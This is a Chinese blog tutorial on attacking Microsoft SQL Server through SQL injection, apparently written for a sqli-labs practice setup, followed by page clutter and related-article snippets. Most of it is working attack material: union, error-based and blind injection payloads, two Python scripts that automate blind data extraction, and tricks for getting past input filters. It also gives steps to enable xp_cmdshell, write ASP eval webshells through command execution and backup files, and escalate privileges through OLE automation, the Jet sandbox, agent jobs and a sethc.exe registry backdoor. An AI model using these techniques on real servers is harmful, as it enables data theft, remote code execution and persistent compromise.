从0学习sql server注入

已于 2022-03-12 11:48:44 修改
阅读量1k 收藏 2
点赞数 2
文章标签: sql 学习 数据库
于 2022-03-10 20:46:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hongduilanjun/article/details/123400530
版权

一,基本语法:

1.信息收集:

用户:

当前用户名:

select user

用户权限:

服务器级别:

select IS_SRVROLEMEMBER('sysadmin')

请添加图片描述

数据库级别:

select IS_MEMBER('db_owner')

在这里插入图片描述

2005的xp_cmdshell 你要知道他的权限一般是system 而2008他是nt authority\network service

系统:
当前数据库名:

select db_name()

数据库版本:

select @@version

计算机名:

select host_name()

当前数据库所在计算机名:

select @@servername

判断战库分离:

select host_name()=@@servername

命令:
是否支持xpcmdshell

select count(*) from master.dbo.sysobjects where xtype = 'x' and name =  'xp_cmdshell'

在这里插入图片描述

返回1就代表存在xp_cmdshell

2.获取数据:
获取库名:

select db_name()

在这里插入图片描述

获取所有数据库名:

select name from master.dbo.sysdatabases;

在这里插入图片描述

获取表名:

select name from test.dbo.sysobjects

sysobjects表是SQL Server的系统表,记录了数据库内创建的每一个对象
sysobjects表结构:

在这里插入图片描述

如果直接使用select name from test.dbo.sysobjects,就会造成将一些无用的数据也回显出来,因此我们需要使用xtype来筛选满足条件的对象
以下是未筛选的回显内容

在这里插入图片描述

select name from test.dbo.sysobjects where xtype = 'u'

以下是我们使用where筛选后的内容

在这里插入图片描述

当然在实际利用中一般回显一回显一行数据,因此需要使用top来限定只反显1行内容

select top 1 name from test.dbo.sysobjects where xtype = 'u'

在这里插入图片描述

那该如何获取下一个表名呢?

在这里插入图片描述

select top 1 name from test.dbo.sysobjects where xtype = 'u' and name  !='emails'

我想你会想,如果是我要获取第10个表名的话岂不是需要写9个条件判断语句,那样也太繁琐了吧
因此我们可以直接利用sql语法,not in(‘xxxx’)

select top 1 name from test.dbo.sysobjects where xtype = 'u' and name  not in('emails','uagents')

在这里插入图片描述

获取字段名:
数据库表syscolumns 各个字段含义:
每个数据库创建后都会有一些系统表用来存储该数据库的一些基本信息
每个表和视图中的每列在表中占一行,存储过程中的每个参数在表中也占一行。该表位于每个数据库中。

在这里插入图片描述

select * from test.dbo.syscolumns

如果不进行筛选的话,会有许多有关数据库配置等无关的字段出现

在这里插入图片描述

在mssql中每一张表都有直接的id,因此我们可以sysobjects来查询到我们想要的表的id,进而达到筛选的目的

select name from test.dbo.syscolumns where id=(select id from  test.dbo.sysobjects where name = 'users') and name<>'id'

在实际情况下,如果我们要爆的数据是在web应用所使用的表时,可以省略test.dbo.

在这里插入图片描述

在这里插入图片描述

当然如果只能回显一行的话依然需要使用top
爆数据:

select top 1 username+':'+ password from test.dbo.users

在这里插入图片描述

爆数据payload总结:

库名:select name from master.dbo.sysdatabases;表名:select top 1 name from test.dbo.sysobjects where xtype = 'u' and name  not in('emails','uagents');列名:select name from syscolumns where id=(select id from sysobjects where  name = 'users') and name<>'id'数据:select top 1 username+':'+ password from test.dbo.users

二,利用方式

1.union注入:

查看字段数:

order by 3

原理:

在这里插入图片描述

在这里插入图片描述

如果字段数超过输出的字段数就会报错,通过报错来确定有几个字段
下面以mssql sqli labs为例:

在这里插入图片描述

在这里插入图片描述

判断出有3个字段
查看回显位置:

union select 1,2,3

可以判断有回显的字段未2,3字段

在这里插入图片描述

爆库名:

union select 1,(select db_name()),3--+

爆表名:

在这里插入图片描述

union all select 1,(select top 1 name from test.dbo.sysobjects where xtype = 'U'),3--+

在这里插入图片描述

union all select 1,(select top 1 name from test.dbo.sysobjects where xtype='U' and name not in ('emalis')),3--+

爆列名:

union select 1,(select top 1 name from test.dbo.syscolumns where id=(select id from test.dbo.sysobjects where name = 'users') and name<>'id'),3--+

在这里插入图片描述

union select 1,(select top 1 name from test.dbo.syscolumns where id=(select id from test.dbo.sysobjects where name = 'users' ) and name not in('id','username')),3--+

在这里插入图片描述

爆数据:

union select 1,2,(select top 1 username%2B':'%2Bpassword from test.dbo.users)--+如果要直接使用+号需要进行url编码%2B,不然会被解析为空格,--+中的+就是空格

在这里插入图片描述

2.报错注入:

报错注入分为三类:
隐式转换,和显示转换,declare函数
隐式转换:

原理:将不同数据类型的数据进行转换或对比select * from test.dbo.users where (select user)>0  #对比select * from test.dbo.users where ((select user)/1)=1 #运算

在这里插入图片描述

在这里插入图片描述

显示转换:

原理:依靠:CAST,DECLARE和CONVERT函数进行数据类型转,当如果转化的是有关查询语句的结果,那么就会触发报错,但注意只能爆一个字符串select 'naihe567' as name,'567' as num)as  b#这里我们使用了select 创建了一个自定义的临时表方便观察select cast((select name from (select 'naihe567' as name,'567' as num)as  b) as int) #cast函数select convert(int,(select name from (select 'naihe567' as name,'567' as  num)as b)) #convert函数declare @s varchar(2000) set @s='select naihe567' exec(@s) #declare

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

后面的爆数据我在这里就不在重复了,也免得浪费读者时间

3.盲注

布尔盲注(有回显):

1.爆破数据库名:

ascii(substring(db_name(),1,1))=95#使用substring将字符串分解,对比ascii码

2.爆破表名:

1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))<95)#通过条件筛选,并使用count来回去返回的行数,如果为1就说明存在,及正确

3.爆破字段名:

ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where  table_name='users'),1,1))<95#通过对比ascii码

4.爆破数据:

ascii(substring((select top 1 username from users),1,1))<95

附带一个简单的脚本

import requestsfrom time import timeurl='http://192.168.0.105/less-1.asp'result=''for num in range(1,100):    #取32-128的ascii码    pointer = 1    min=32    max=128    #num为当前的爆破的字符位置    #pointer为正在使用的ascii    while 1:        pointer=min+(max-min)//2        if min==pointer:            if pointer == 127 or pointer == 0:                exit()            result += chr(pointer)            print(result)            break        # 爆表名        #payload = f"?id=1' and ascii(substring((select top 1 name from master.dbo.sysdatabases),{num},1)) < {pointer}--+".format(        #num, pointer)        # 爆表名        # payload = f"?id=1' and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,{num},1))<{pointer})--+".format(        #     num, pointer)        # 爆表名        payload = f"?id=1' and ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where  table_name='users'),{num},1))<{pointer}--+".format(            num, pointer)        result_html=requests.get(url=url+payload).text        # print(result_html)        if r"Your Login name" in result_html:            max=pointer        else :            min=pointer

时间盲注(无回显):

使用WAITFOR DELAY进行延迟

;if (ascii(substring(db_name(),2,1)))=101 WAITFOR DELAY '0:0:5'#这里利用并不能像mysql一样在where语句后添加if语句,而是只能利用堆叠注入添加一个if语句来执行延迟操作和布尔盲注基本一样,在这里直接上脚本:

import requestsimport timeurl='http://192.168.0.105/less-1.asp'result=''for num in range(1,100):    #取32-128的ascii码    pointer = 1    min=32    max=128    #num为当前的爆破的字符位置    #pointer为正在使用的ascii    while 1:        pointer=min+(max-min)//2        if min==pointer:            if pointer == 127 or pointer == 0:                exit()            result += chr(pointer)            print(result)            break        # 爆表名        payload = f"?id=1';if(ascii(substring((select top 1 name from master.dbo.sysdatabases),{num},1))) < {pointer} WAITFOR DELAY '0:0:1'--+".format(        num, pointer)        # 爆表名        # payload = f"?id=1' if(1)=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,{num},1))<{pointer}) WAITFOR DELAY '0:0:1'--+".format(        #     num, pointer)        # 爆表名        # payload = f"?id=1';if(ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where  table_name='users'),{num},1)))<{pointer} WAITFOR DELAY '0:0:1'--+".format(        #     num, pointer)        result_html=requests.get(url=url+payload).text        # print(url+payload)        # print(result_html)        try:            r = requests.get(url=url+payload,timeout=0.5)            min = pointer        except:            max = pointer        time.sleep(0.2)    time.sleep(1)

值得注意的是,盲注其实也可以使用like加通配符进行注入,但是如果使用ascii,可以使用二分法减少运算量,因此like的方法我们就不在重复,浪费大家的时间了,推荐使用二分法

三,绕过:

1.垃圾数据:

注释:

单行注释:利用单行注释将多行注释注释掉然后利用换行符换行 多行注释: /*xxxx*/,xxxx可以是符合数字和字符(这非常关键),但没有mysql中的/*!xx*/这种用法

单行:

![在这里插入图片描述](https://img-blog.csdnimg.cn/e8755410769542a5b441869aa510b144.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA57qi6ZifIOiTneWGmw==,size_11,color_FFFFFF,t_70,g_se,x_16)

但在web传参时需要进行url编码:

select --/*%0a'naihe567'%0a--*/

多行:

在这里插入图片描述

这里是mssql的

在这里插入图片描述

下面是mysql的

在这里插入图片描述

运算符:
运算符一般是配合报错注入使用

select * from test.dbo.users where ++++-+-~~1=(select user)#原理是使用特殊运算只会改变值并不会改变数据类型,-+^*|&都可以使用

在这里插入图片描述

2.编码:

编码主要是利用十六进制和ascii码
users表内容如下:

在这里插入图片描述

十六进制:

select * from test.dbo.users where username=0x44756d6d79Dummy的十六进制为0x44756d6d79

在这里插入图片描述

ascii码:

select * from test.dbo.users where username =  char(100)+char(117)+char(109)+char(109)+CHAR(121)#使用char函数

在这里插入图片描述

3.回调:

使用declear与exec函数
declear会创建一个局部变量,在使用exec执行变量中的内容

declare @s varchar(2000) set @s=0x73656c656374206e61696865353637  exec(@s)#declear与exec其实是属于报错注入范畴,但是它可以将一个完成的sql语句进行编码执行#0x73656c656374206e61696865353637 解码后就是 select naihe567declare @s varchar(2000) set  @s=CHAR(115)+CHAR(101)+CHAR(108)+CHAR(101)+CHAR(99)+CHAR(116)+CHAR(32)+...+CHAR(39) exec(@s)#ascii也可以

在这里插入图片描述

4.替换:

利用其他空白符替换空格:

%20 %09 %0a %0b %0c %0d

利用[],()替换空格:

select(username)from[test].[dbo].[users]

在这里插入图片描述

四,写shell:

1.xp_cmdshell:

查看能否使用xpcmd_shell;

select count(*) from master.dbo.sysobjects where xtype = 'x' and name =  'xp_cmdshell'

直接使用xpcmd_shell执行命令:

EXEC master.dbo.xp_cmdshell 'whoami'

在这里插入图片描述

发现居然无法使用

查看是否存在xp_cmdshell:

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

在这里插入图片描述

到现在我们知道了,这台mssql支持xp_cmdshell,但没有开启
开启xp_cmdshell:

启用:EXEC sp_configure 'show advanced options', 1RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关闭:exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 0;reconfigure;

在这里插入图片描述

执行命令:

EXEC master.dbo.xp_cmdshell 'whoami'

在这里插入图片描述

可以看到这里已经有了system权限
主要找到web路径就可以使用cmd目录创建文件,获取web路径在后面有讲解

exec master..xp_cmdshell 'echo ^<%@ Page  Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> >  c:\\666.asp';

在这里插入图片描述

注意:
如果xp_cmdshell被删除了,需要自己上传xplog70.dll进行恢复
在这里插入图片描述

exec master.sys.sp_addextendedproc ‘xp_cmdshell’,‘C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll’
虽然是写shell,但是xp_cmdshell更多的是用来提权,具体原因其实思考一下就明白了。。。。(我都能上传东西了,我还写什么webshell啊。。。)

2.差异备份:

生成备份文件:

backup database test to disk = 'c:\bak.bak';--

创建表:

create table [dbo].[test] ([cmd] [image]);

插入一句话:

insert into test(cmd)  values(0x3C25657865637574652872657175657374282261222929253E)

再次备份:

backup database test to disk='C:\567.asp' WITH DIFFERENTIAL,FORMAT;--

在这里插入图片描述

就会生成一个asp一句话

在这里插入图片描述

3.LOG备份:

1. alter database test set RECOVERY FULL2. create table cmd (a image)3. backup log test to disk = 'c:\test' with init4. insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)5. backup log test to disk = 'c:\test\2.asp'#LOG备份的要求是他的数据库备份过,而且选择恢复模式得是完整模式

4.路径获取

由于要写webshell,那么必须知道web的路径

1.通过报错获取网站路径

在这里插入图片描述

2.使用xp_dirtree获取目录信息:

![在这里插入图片描述](https://img-blog.csdnimg.cn/fc300dfff1584a4e8497a17425360eea.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA57qi6ZifIOiTneWGmw==,size_17,color_FFFFFF,t_70,g_se,x_16)

3.通过xpcmd_shell:

exec master..xp_cmdshell 'for /r c:\ %i in (i*.aspx) do @echo %i'

在这里插入图片描述

回显问题:
看到这里,可能有很多小伙伴会不耐烦的说,这是我在软件上执行的sql命令,并非真实注入,该如何回显出信息
其实我们观察这些payload就可以发现,这些命令并非查询语句,并不能与普通的sql语句在一个语句中,
因此想要回显就必须满足,服务器支持堆叠注入

在这里插入图片描述

在这里插入图片描述

接下来我们的思路就是创建一张临时表来接收命令执行返回的内容,然后我们在通过查临时表来获取数据

创建临时表:

CREATE TABLE tmpTable (tmp1 varchar(8000));

将数据存入表中:

insert into tmpTable(tmp1) exec master..xp_cmdshell 'ipconfig'

获取数据:

select * from tmpTable

在这里插入图片描述

后面就是常规爆数据了

五,提权:

1.xp_cmdshell提权:

xp_cmdshell在前面写webshell已经讲解过了,在这里不在重复

2.sp_oacreate提权:

启用:EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 0;RECONFIGURE WITH OVERRIDE;

执行:declare @shell int exec sp_oacreate 'wscript.shell',@shell outputexec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'

在这里插入图片描述

3.沙盒提权:

1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

2. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

沙盒模式SandBoxMode参数含义(默认是2)
`0`:在任何所有者中禁止启用安全模式
`1` :为仅在允许范围内
`2` :必须在access模式下
`3`:完全开启

执行命令:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\ias\ias.mdb','select shell( net user naihe QWE123. /add )');

4.public

USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.2cto.com
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'

5.xp_regwrite

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution
Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';

后记

欢迎关注团队公众号:红队蓝军
在这里插入图片描述

红队蓝军
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Nginx中server_name指令介绍
冷酷的小白
02-15 1万+
Nginx中server_name指令介绍 用途 根据官方文档说明,用来设置虚拟服务器,对于用IP还是请求头部中的Host字段内容设置这个指令的值,没有明确的分别。 用法 指令后跟特定域名,此时第一个域名为主域名 server_name example.com www.example.com; 指令后跟泛域名 server_name example.com *.example.com www.example.*; 特别的,example.com和*.example.com可以合并为一个,语法为 serv
sql server技术知识
shicuicui1234的博客
08-30 1304
SSMS  常见的数据库模型:【数据库管理系统中数据的存储结构】 层次模型 网状模型 关系模型【SSMS 使用】 1.sqlserver的分离与附加【移动数据库的时候使用】 分离:删除链接,可以移动数据库的mdf文件 附加:选中mdf文件添加,还原数据库 sqlserver数据库的备份与还原 2.数据库创建的时候需要创建两种数据文件: 数据文件:
SQL Server注入
余十步的博客
06-01 604
原理:凡是在group by后面出现的字段,必须同时在select后面出现;凡是在select后面出现的、同时未在聚合函数中出现的字段,必须同时出现在group by后面。原理:试图将一个字符串与非字符串基本,或将一个字符串转换为另一个不兼容的类型时,那么SQL编辑器会抛出异常。不嵌入子查询:常用内置函数(conver或者case函数:将一种数据类型转换为另一种数据类型)也可以通过定义十六进制的SQL语句,使用exec函数执行。语句执行正常代表数据类型兼容,就可以将x换位SQL语句(如利用视图查询)
SQLServer数据库注入详解
谢公子的博客
06-28 2万+
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 SQLServer数据库 SQL S...
SQL Server数据库的查询语句
weixin_43977912的博客
07-12 1776
select @@version; #查询数据库的版本 select @@servername; #查询服务名 select host_name(); #查询主机名,如果是用navicat远程连接的话,主机名是本地的名字 select db_name(); #查询当前数据库名 select db_name(1); #查询第一个数据库名 select db_name(2); #查询第二个数据库名 select user; #查询当
nginx中server_name与host匹配优先级
weixing100200的专栏
07-12 2493
在开始处理一个http请求时,nginx会取出header头中的host,与nginx.conf中每个serverserver_name进行匹配,以此决定到底由哪一个server块来处理这个请求。server_name与host匹配优先级如下:1、完全匹配,选择所有字符串完全匹配的server_name,如www.test.com2、通配符在前面的server_name,如*.test.com3、通配符在后面的server_name,如www.test.*4、最后选择使用正则表达式才匹配的server_n
三步堵死 SQL Server注入漏洞
09-11
三步堵死 SQL Server 注入漏洞 SQL Server 注入漏洞是一种常见的 Web 应用程序安全漏洞,攻击者可以通过构造恶意的 SQL 语句来获取或修改数据库中的数据,以获取未经授权的访问权限。为防止 SQL Server 注入漏洞,...
.net sqlserver 学习数据文件
05-07
标题中的".net sqlserver 学习数据文件"指的是一个针对.NET开发者和SQL Server数据库管理员的学习资源,特别是关于如何在.NET环境中使用SQL Server进行数据操作。这个主题涵盖了多种知识点,包括但不限于: 1. **...
sqlserver驱动jar
11-23
String url = "jdbc:sqlserver://localhost:1433;databaseName=myDatabase"; String username = "myUsername"; String password = "myPassword"; try { Class.forName(...
Sql serversql注入
12-14
 关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下  防范sql注入的方法无非有以下几种:  1.使用类型安全的SQL参数  2.使用参数化输入...
nginx配置:server_name的作用
热门推荐
xiejianweifdd的博客
02-13 2万+
nginx的server_name最新详解
mssql提权总结
st3pby的博客
12-30 2660
mssql提权总结
SQL Server手工注入方式
good good study
01-04 5677
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
sql 指定服务器名称,SQL语句实现查询SQLServer服务器名称和IP地址
weixin_36380063的博客
07-31 1443
获取服务器名称:SELECT SERVERPROPERTY('MachineName')select @@SERVERNAMEselect HOST_NAME()获取IP地址可以使用xp_cmdshell执行ipconfig命令:--开启xp_cmdshellexec sp_configure'show advanced options', 1reconfigure with overrideex...
网页木马学习3
swort_177的专栏
01-08 795
SELECT @@VERSIONSELECT name FROM master.dbo.sysdatabasesSELECT DB_NAME()SELECT IS_SRVROLEMEMBER(sysadmin)IS_SRVROLEMEMBER ( role [ , login ] )指明当前的用户登录是否是指定的服务器角色的成员。IS_SRVROLEMEMBER
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5313
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL注入基础
屿的博客
02-14 4440
各位靓仔们是否经常听到sql注入呢,那么什么是sql注入?引用微软官方的语言来说:SQL 注入是一种攻击方式,在这种攻击方式中,在字符串中插入恶意代码,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。构成 SQL 语句的任何过程都应进行注入漏洞审阅,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。那么接下来,让我们来了解一下sql注入是如何产生的。
SQL SERVER注入要点
Lee
05-14 478
SQL SERVER注入要点 一、SQLServer数据库的查询语句 #函数查询 1.select @@version; #查询数据库的版本 2.select host_name(); #查询主机名,如果是用navicat远程连接的话,主机名是本地的名字 3.select db_name(); #查询当前数据库名 4.select user; #查询当前数据库的拥有者,结果为dbo。dbo是每个数据库的默认用户, 具有所有者权限全称:databaseOw
SQL Server 注入
mingyqf的博客
03-22 2394
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
sql server注入查询数据库
最新发布
06-04
SQL Server注入是指攻击者利用程序对输入数据没有进行充分检查过滤的漏洞,向程序中注入恶意的SQL语句,从而达到控制数据库的目的。攻击者可以通过SQL Server注入的方式获取、修改、删除数据库中的数据。 下面是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值